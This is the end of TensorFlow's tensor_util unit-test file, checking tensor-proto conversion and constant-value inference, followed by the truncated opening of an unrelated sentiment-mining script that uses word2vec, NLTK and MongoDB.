self.assertAllClose(
np.array([[10.0, 20.0, 30.0]], dtype=np.float64),
tensor_util.MakeNdarray(t))
def testFloatTypesWithImplicitRepeat(self):
for dtype, nptype in [(dtypes.float32, np.float32),
(dtypes.float64, np.float64)]:
t = tensor_util.make_tensor_proto([10.0], shape=[3, 4], dtype=dtype)
a = tensor_util.MakeNdarray(t)
self.assertAllClose(
np.array(
[[10.0, 10.0, 10.0, 10.0],
[10.0, 10.0, 10.0, 10.0],
[10.0, 10.0, 10.0, 10.0]],
dtype=nptype),
a)
def testFloatMutateArray(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], dtype=dtypes.float32)
a = tensor_util.MakeNdarray(t)
a[0] = 5.0
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([5.0, 20.0, 30.0], dtype=np.float32), a)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
def testHalf(self):
t = tensor_util.make_tensor_proto(np.array([10.0, 20.0], dtype=np.float16))
self.assertProtoEquals("""
dtype: DT_HALF
tensor_shape {
dim {
size: 2
}
}
half_val: 18688
half_val: 19712
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float16, a.dtype)
self.assertAllClose(np.array([10.0, 20.0], dtype=np.float16), a)
def testInt(self):
t = tensor_util.make_tensor_proto(10)
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape {}
int_val: 10
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int32, a.dtype)
self.assertAllClose(np.array(10, dtype=np.int32), a)
def testLargeInt(self):
value = np.iinfo(np.int64).max
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: %d
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(value, dtype=np.int64), a)
def testLargeNegativeInt(self):
# We don't use the min np.int64 value here
# because it breaks np.abs().
#
# np.iinfo(np.int64).min = -9223372036854775808
# np.iinfo(np.int64).max = 9223372036854775807
# np.abs(-9223372036854775808) = -9223372036854775808
value = np.iinfo(np.int64).min + 1
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: %d
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(value, dtype=np.int64), a)
def testIntNDefaultType(self):
t = tensor_util.make_tensor_proto([10, 20, 30, 40], shape=[2, 2])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape { dim { size: 2 } dim { size: 2 } }
tensor_content: "\000\000\000\\n\000\000\000\024\000\000\000\036\000\000\000("
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape { dim { size: 2 } dim { size: 2 } }
tensor_content: "\\n\000\000\000\024\000\000\000\036\000\000\000(\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int32, a.dtype)
self.assertAllClose(np.array([[10, 20], [30, 40]], dtype=np.int32), a)
def testIntTypes(self):
for dtype, nptype in [(dtypes.int32, np.int32),
(dtypes.uint8, np.uint8),
(dtypes.uint16, np.uint16),
(dtypes.int16, np.int16),
(dtypes.int8, np.int8)]:
# Test with array.
t = tensor_util.make_tensor_proto([10, 20, 30], dtype=dtype)
self.assertEquals(dtype, t.dtype)
self.assertProtoEquals("dim { size: 3 }", t.tensor_shape)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
# Test with ndarray.
t = tensor_util.make_tensor_proto(np.array([10, 20, 30], dtype=nptype))
self.assertEquals(dtype, t.dtype)
self.assertProtoEquals("dim { size: 3 }", t.tensor_shape)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
def testIntTypesWithImplicitRepeat(self):
for dtype, nptype in [(dtypes.int64, np.int64),
(dtypes.int32, np.int32),
(dtypes.uint8, np.uint8),
(dtypes.uint16, np.uint16),
(dtypes.int16, np.int16),
(dtypes.int8, np.int8)]:
self.assertAllEqual(
np.array(
[[10, 10, 10, 10],
[10, 10, 10, 10],
[10, 10, 10, 10]],
dtype=nptype),
tensor_util.MakeNdarray(
tensor_util.make_tensor_proto(
[10],
shape=[3, 4],
dtype=dtype)))
def testIntMixedWithDimension(self):
# Github issue: 11974
dtype = dtypes.int32
nptype = np.int32
t = tensor_util.make_tensor_proto(
[10, tensor_shape.Dimension(20), 30], dtype=dtype)
self.assertEquals(dtype, t.dtype)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
def testLong(self):
t = tensor_util.make_tensor_proto(10, dtype=dtypes.int64)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: 10
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(10, dtype=np.int64), a)
def testLongN(self):
t = tensor_util.make_tensor_proto(
[10, 20, 30], shape=[1, 3], dtype=dtypes.int64)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000\000\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036\000\000\000\000\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([[10, 20, 30]], dtype=np.int64), a)
def testLongNpArray(self):
t = tensor_util.make_tensor_proto(np.array([10, 20, 30]))
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000\000\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 3 } }
tensor_content: "\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036\000\000\000\000\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=np.int64), a)
def testQuantizedTypes(self):
# Test with array.
data = [(21,), (22,), (23,)]
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QINT32
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000\000\025\000\000\000\026\000\000\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QINT32
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\000\000\026\000\000\000\027\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint32.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.quint8)
self.assertProtoEquals("""
dtype: DT_QUINT8
tensor_shape { dim { size: 3 } }
tensor_content: "\025\026\027"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.quint8.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint8)
self.assertProtoEquals("""
dtype: DT_QINT8
tensor_shape { dim { size: 3 } }
tensor_content: "\025\026\027"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint8.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.quint16)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QUINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\000\025\000\026\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QUINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\026\000\027\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.quint16.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint16)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\000\025\000\026\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\026\000\027\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint16.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
def testString(self):
t = tensor_util.make_tensor_proto("foo")
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape {}
string_val: "foo"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertEquals([b"foo"], a)
def testStringWithImplicitRepeat(self):
t = tensor_util.make_tensor_proto("f", shape=[3, 4])
a = tensor_util.MakeNdarray(t)
self.assertAllEqual(np.array([[b"f"] * 4] * 3, dtype=np.object), a)
def testStringN(self):
t = tensor_util.make_tensor_proto([b"foo", b"bar", b"baz"], shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testStringNpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[b"a", b"ab"], [b"abc", b"abcd"]]))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 2 } dim { size: 2 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"a", b"ab"], [b"abc", b"abcd"]]), a)
def testArrayMethod(self):
class Wrapper(object):
def __array__(self):
return np.array([b"foo", b"bar", b"baz"])
t = tensor_util.make_tensor_proto(Wrapper(), shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testArrayInterface(self):
class Wrapper(object):
@property
def __array_interface__(self):
return np.array([b"foo", b"bar", b"baz"]).__array_interface__
t = tensor_util.make_tensor_proto(Wrapper(), shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testStringTuple(self):
t = tensor_util.make_tensor_proto((b"a", b"ab", b"abc", b"abcd"))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 4 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array((b"a", b"ab", b"abc", b"abcd")), a)
def testStringNestedTuple(self):
t = tensor_util.make_tensor_proto(((b"a", b"ab"), (b"abc", b"abcd")))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 2 } dim { size: 2 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array(((b"a", b"ab"), (b"abc", b"abcd"))), a)
def testComplex64(self):
t = tensor_util.make_tensor_proto((1 + 2j), dtype=dtypes.complex64)
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape {}
scomplex_val: 1
scomplex_val: 2
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(np.array(1 + 2j), a)
def testComplex128(self):
t = tensor_util.make_tensor_proto((1 + 2j), dtype=dtypes.complex128)
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape {}
dcomplex_val: 1
dcomplex_val: 2
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(np.array(1 + 2j), a)
def testComplexWithImplicitRepeat(self):
for dtype, np_dtype in [(dtypes.complex64, np.complex64),
(dtypes.complex128, np.complex128)]:
t = tensor_util.make_tensor_proto((1 + 1j), shape=[3, 4], dtype=dtype)
a = tensor_util.MakeNdarray(t)
self.assertAllClose(
np.array(
[[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)],
[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)],
[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)]],
dtype=np_dtype),
a)
def testComplex64N(self):
t = tensor_util.make_tensor_proto(
[(1 + 2j), (3 + 4j), (5 + 6j)], shape=[1, 3], dtype=dtypes.complex64)
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape { dim { size: 1 } dim { size: 3 } }
scomplex_val: 1
scomplex_val: 2
scomplex_val: 3
scomplex_val: 4
scomplex_val: 5
scomplex_val: 6
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(np.array([[(1 + 2j), (3 + 4j), (5 + 6j)]]), a)
def testComplex128N(self):
t = tensor_util.make_tensor_proto(
[(1 + 2j), (3 + 4j), (5 + 6j)], shape=[1, 3], dtype=dtypes.complex128)
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape { dim { size: 1 } dim { size: 3 } }
dcomplex_val: 1
dcomplex_val: 2
dcomplex_val: 3
dcomplex_val: 4
dcomplex_val: 5
dcomplex_val: 6
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(np.array([[(1 + 2j), (3 + 4j), (5 + 6j)]]), a)
def testComplex64NpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]),
dtype=dtypes.complex64)
# scomplex_val are real_0, imag_0, real_1, imag_1, ...
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape { dim { size: 2 } dim { size: 2 } }
scomplex_val: 1
scomplex_val: 2
scomplex_val: 3
scomplex_val: 4
scomplex_val: 5
scomplex_val: 6
scomplex_val: 7
scomplex_val: 8
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]), a)
def testComplex128NpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]),
dtype=dtypes.complex128)
# scomplex_val are real_0, imag_0, real_1, imag_1, ...
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape { dim { size: 2 } dim { size: 2 } }
dcomplex_val: 1
dcomplex_val: 2
dcomplex_val: 3
dcomplex_val: 4
dcomplex_val: 5
dcomplex_val: 6
dcomplex_val: 7
dcomplex_val: 8
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]), a)
def testUnsupportedDTypes(self):
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(np.array([1]), 0)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(3, dtype=dtypes.qint8)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto([3], dtype=dtypes.qint8)
# Validate the helpful error message when trying to convert an
# unconvertible list as strings.
with self.assertRaisesRegexp(TypeError, "Failed to convert object"):
tensor_util.make_tensor_proto([tensor_shape.Dimension(1)])
def testTensorShapeVerification(self):
array = np.array([[1], [2]])
correct_shape = (2, 1)
incorrect_shape = (1, 2)
tensor_util.make_tensor_proto(array, shape=correct_shape, verify_shape=True)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(
array, shape=incorrect_shape, verify_shape=True)
def testShapeTooLarge(self):
with self.assertRaises(ValueError):
tensor_util.make_tensor_proto(np.array([1, 2]), shape=[1])
def testLowRankSupported(self):
t = tensor_util.make_tensor_proto(np.array(7))
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: 7
""", t)
def testShapeEquals(self):
t = tensor_util.make_tensor_proto([10, 20, 30, 40], shape=[2, 2])
self.assertTrue(tensor_util.ShapeEquals(t, [2, 2]))
self.assertTrue(tensor_util.ShapeEquals(t, (2, 2)))
self.assertTrue(
tensor_util.ShapeEquals(t, tensor_shape.as_shape([2, 2]).as_proto()))
self.assertFalse(tensor_util.ShapeEquals(t, [5, 3]))
self.assertFalse(tensor_util.ShapeEquals(t, [1, 4]))
self.assertFalse(tensor_util.ShapeEquals(t, [4]))
def testMockArray(self):
class MockArray(object):
def __init__(self, array):
self.array = array
def __array__(self, dtype=None):
return np.asarray(self.array, dtype)
with self.test_session() as sess:
ma = MockArray(np.array([10, 20, 30]))
t = ops.convert_to_tensor(ma)
a = sess.run(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=np.int64), a)
class ConstantValueTest(test.TestCase):
def testConstant(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = constant_op.constant(np_val)
self.assertAllClose(np_val, tensor_util.constant_value(tf_val))
np_val = np.random.rand(3, 0, 7).astype(np.float32)
tf_val = constant_op.constant(np_val)
self.assertAllClose(np_val, tensor_util.constant_value(tf_val))
def testUnknown(self):
tf_val = gen_state_ops._variable(
shape=[3, 4, 7],
dtype=dtypes.float32,
name="tf_val",
container="",
shared_name="")
self.assertIs(None, tensor_util.constant_value(tf_val))
def testShape(self):
np_val = np.array([1, 2, 3], dtype=np.int32)
tf_val = array_ops.shape(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(np_val, c_val)
self.assertEqual(np.int32, c_val.dtype)
def testFill(self):
np_val = np.array([-1, -1, -1], dtype=np.float32)
tf_val = array_ops.fill([3], constant_op.constant(-1.0))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(np_val, c_val)
self.assertEqual(np.float32, c_val.dtype)
def testSize(self):
tf_val = array_ops.size(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(6, c_val)
def testSizeOfScalar(self):
tf_val = array_ops.size(constant_op.constant(0.0))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(1, c_val)
self.assertEqual(np.ndarray, type(c_val))
def testRank(self):
tf_val = array_ops.rank(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(np.ndarray, type(c_val))
self.assertEqual((), c_val.shape)
self.assertEqual(3, c_val)
# Repeat test using array_ops.rank_internal to avoid the optimization that
# happens in the rank function.
tf_val = array_ops.rank_internal(
constant_op.constant(
0.0, shape=[1, 2, 3]), optimize=False)
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(np.ndarray, type(c_val))
self.assertEqual((), c_val.shape)
self.assertEqual(3, c_val)
self.assertEqual([3], c_val)
def testCast(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = math_ops.cast(constant_op.constant(np_val), dtypes.float64)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val.astype(np.float64), c_val)
np_val = np.random.rand(3, 0, 7).astype(np.float32)
tf_val = math_ops.cast(constant_op.constant(np_val), dtypes.float64)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val.astype(np.float64), c_val)
def testConcat(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = array_ops.concat(
[np_val[0:1, :, :], np_val[1:2, :, :], np_val[2:3, :, :]], 0)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val, c_val)
tf_val = array_ops.concat(
[np_val[0, :, :], np_val[1, :, :], np_val[2, :, :]],
array_ops.placeholder(dtypes.int32))
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
tf_val = array_ops.concat([
np_val[0, :, :], array_ops.placeholder(dtypes.float32), np_val[2, :, :]
], 1)
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Axis0(self):
inputs = [np.random.rand(4, 7) for _ in range(3)]
np_val = np.array(inputs)
tf_val = array_ops.stack(inputs)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val, c_val)
tf_val = array_ops.stack(
[inputs[0], array_ops.placeholder(dtypes.float32), inputs[2]])
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Axis1(self):
inputs = [np.random.rand(4, 7) for _ in range(3)]
tf_val = array_ops.stack(inputs, axis=1)
c_val = tensor_util.constant_value(tf_val)
self.assertIsNone(c_val)
tf_val = array_ops.stack(
[inputs[0], array_ops.placeholder(dtypes.float32), inputs[2]], axis=1)
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Partial_Axis0(self):
input_ = np.random.rand(4, 7)
tf_val = array_ops.stack([input_, array_ops.placeholder(dtypes.float32)])
c_val = tensor_util.constant_value(tf_val, partial=True)
self.assertAllClose(input_, c_val[0])
self.assertIsNone(c_val[1])
def testPack_Partial_Axis1(self):
input_ = np.random.rand(4, 7)
tf_val = array_ops.stack([input_, array_ops.placeholder(dtypes.float32)],
axis=1)
c_val = tensor_util.constant_value(tf_val, partial=True)
self.assertIsNone(c_val)
def testEqual(self):
# Scalar inputs.
tf_val = math_ops.equal(constant_op.constant(1), constant_op.constant(1))
self.assertEqual(tensor_util.constant_value(tf_val), True)
tf_val = math_ops.equal(constant_op.constant(1), constant_op.constant(0))
self.assertEqual(tensor_util.constant_value(tf_val), False)
# Shaped inputs with broadcast semantics.
tf_val = math_ops.equal(constant_op.constant([[0, 1]]),
constant_op.constant([[0], [1]]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(c_val, [[True, False], [False, True]])
def testNotEqual(self):
# Scalar inputs.
tf_val = math_ops.not_equal(constant_op.constant(1),
constant_op.constant(1))
self.assertEqual(tensor_util.constant_value(tf_val), False)
tf_val = math_ops.not_equal(constant_op.constant(1),
constant_op.constant(0))
self.assertEqual(tensor_util.constant_value(tf_val), True)
# Shaped inputs with broadcast semantics.
tf_val = math_ops.not_equal(constant_op.constant([[0, 1]]),
constant_op.constant([[0], [1]]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(c_val, [[False, True], [True, False]])
class ConstantValueAsShapeTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def testConstant(self):
np_val = np.random.rand(3).astype(np.int32)
tf_val = constant_op.constant(np_val)
self.assertEqual(
tensor_shape.TensorShape(np_val),
tensor_util.constant_value_as_shape(tf_val))
tf_val = constant_op.constant([], dtype=dtypes.int32)
self.assertEqual(
tensor_shape.TensorShape([]),
tensor_util.constant_value_as_shape(tf_val))
@test_util.run_in_graph_and_eager_modes()
def testShape(self):
tf_val = array_ops.shape(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual(tensor_shape.TensorShape([1, 2, 3]), c_val)
@test_util.run_in_graph_and_eager_modes()
def testMinusOneBecomesNone(self):
tf_val = constant_op.constant([-1, 1, -1], shape=[3])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, 1, None], c_val.as_list())
def testPack(self):
tf_val = array_ops.stack(
[constant_op.constant(16), 37, array_ops.placeholder(dtypes.int32)])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None], c_val.as_list())
def testConcat(self):
tf_val = array_ops.concat(
[[16, 37], array_ops.placeholder(
dtypes.int32, shape=(2,))], 0)
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, None], c_val.as_list())
tf_val = array_ops.concat(
[[16, 37], array_ops.placeholder(
dtypes.int32, shape=(1,)), [48]], 0)
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, 48], c_val.as_list())
def testSlice(self):
tf_val = array_ops.placeholder(dtypes.int32, shape=(4,))[0:2]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, None], c_val.as_list())
# begin:end
tf_val = constant_op.constant([10, 20, 30])[1:3]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([20, 30], c_val.as_list())
# begin:end:stride
tf_val = array_ops.strided_slice(
constant_op.constant([10, 20, 30]), [1], [3], strides=[2])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([20], c_val.as_list())
# [1, 2, 16, 37, None, 48]
tf_val_orig = array_ops.concat(
[[1, 2, 16, 37], array_ops.placeholder(
dtypes.int32, shape=(1,)), [48]], 0)
# begin: no end
tf_val = tf_val_orig[2:]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, 48], c_val.as_list())
# begin::negative slice
tf_val = tf_val_orig[2::-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 2, 1], c_val.as_list())
# :end:negative slice
tf_val = tf_val_orig[:1:-2]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([48, 37], c_val.as_list())
# begin:end:negative slice
tf_val = tf_val_orig[3:1:-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16], c_val.as_list())
# begin:negative end:slice
tf_val = tf_val_orig[1:-3:1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([2, 16], c_val.as_list())
# negative begin::slice
tf_val = tf_val_orig[-3::1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, None, 48], c_val.as_list())
# negative begin::negative slice
tf_val = tf_val_orig[-3::-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16, 2, 1], c_val.as_list())
# negative begin:negative end:negative slice
tf_val = tf_val_orig[-3:-5:-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16], c_val.as_list())
# Do not support shape inference for additional arguments
tf_val = constant_op.constant([10, 20, 30])[...]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, None, None], c_val.as_list())
# Do not support shape inference for tensor slices.
tf_val = constant_op.constant([10, 20, 30])[
array_ops.placeholder(dtypes.int32, shape=()):]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual(tensor_shape.unknown_shape(), c_val)
# Do not support shape inference for higher rank
with self.assertRaises(ValueError):
tf_val = constant_op.constant([[10], [20], [30]])[:, 0:]
c_val = tensor_util.constant_value_as_shape(tf_val)
if __name__ == "__main__":
test.main()
| apache-2.0 | 7,437,894,312,507,629,000 | 34.661891 | 121 | 0.604773 | false |
johnthebrave/sentiment-mining | src/nn.py | 1 | 9990 | __author__ = 'alexei'
import gensim
from data_processing.mongo import MongoORM
from data_processing.util import Timer
from pprint import pprint as pp
import nltk
from nltk.stem import WordNetLemmatizer as wnl
wnl = wnl()
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.tools.shortcuts import buildNetwork
from pybrain.structure.modules import TanhLayer
import numpy as np
splitters = {"but", "however", "although", "though", "moreover"}
ignore_pos_set = {"c", "e", "p", "t", "w"}
ignore_word_set = {"of", "a", "an", "it", "the", "that", "this", "these", "those", "\\"}
def w2vec_model():
model = gensim.models.Word2Vec.load('../data/w2v_for_rotten.model')
model.init_sims(replace=True)
return model
def miner(text, deps, features, negation):
#, feature_vectors, model):
# pp(text)
sentences = []
# vectors = []
current_sentence = []
# current_vec = None
negate = False
for dep in deps:
if dep[0] == 'neg':
negate = True
negation.append(negate)
for j in xrange(len(text)):
word = text[j]
if word in ignore_word_set:
continue
if word in splitters:
if len(current_sentence) > 0:
sentences.append(current_sentence)
# vectors.append(current_vec)
# current_vec = None
current_sentence = []
continue
pos = nltk.pos_tag([word])[0][1].lower()
if pos[0] in ignore_pos_set:
continue
# if word in model:
# if current_vec is None:
# current_vec = model[word]
# else:
# current_vec += model[word]
current_sentence.append(word)
if len(current_sentence) > 0:
sentences.append(current_sentence)
# vectors.append(current_vec)
if len(sentences) > 1:
features.append(sentences)
# feature_vectors.append(current_vec)
else:
features += sentences
# feature_vectors += vectors
def augument_dataset_with_negation():
t = Timer()
mongo = MongoORM("rotten")
phrases = mongo.get_collection("phrases")
for phrase in phrases:
negation = []
idx = 0
while idx < len(phrase["deps"]):
deps = phrase["deps"][idx]
neg = False
for dep in deps:
if dep[0] == 'neg':
neg = True
if neg:
negation.append(True)
else:
negation.append(False)
idx += 1
mongo.update_item("training_set", {"_id": phrase["_id"]}, {"$set": {"neg": negation}})
t.measure("rotten corpus augumented in: ")
def build_rotten_dataset():
